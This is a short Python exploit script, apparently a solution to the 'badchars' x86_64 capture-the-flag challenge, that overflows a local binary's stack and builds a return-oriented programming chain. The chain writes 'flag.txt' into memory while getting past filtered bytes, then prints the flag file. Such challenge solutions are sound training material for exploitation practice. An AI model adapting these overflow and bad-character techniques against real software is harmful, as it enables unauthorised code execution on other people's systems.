x86_64/badchars/exploit.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

#!/usr/bin/env python3
from pwn import *
from time import sleep


def strfixandcopy(dest, string, badchars, payload):
    badchar_locations = []
    fixed_str = b''
    for n,l in enumerate(string):
        if l in badchars:
            fixed_str += bytes([ord(string[n]) - 1])
            badchar_locations.append(n)
        else:
            fixed_str += bytes([ord(string[n])])

    payload += p64(0x000000000040069c)  # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
    
    payload += fixed_str                # r12
    payload += p64(dest)                # r13
    payload += p64(1)                   # r14
    payload += p64(1)                   # r15 

    payload += p64(0x0000000000400634)  # moves fixed string

    for badchar_location in badchar_locations:
        payload += p64(0x00000000004006a0)  # pop r14, r15
        payload += p64(1)
        payload += p64(dest + badchar_location)
        payload += p64(0x000000000040062c)  #does the adding

    return(payload)
            
prog = process('./badchars')
payload = b''
for c in range(40):
    payload += b'a'


payload = strfixandcopy(0x601be0, 'flag.txt', 'xga.', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0)
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)

sleep(0.5)
print(str(prog.recv(), 'UTF-8'))
prog.close()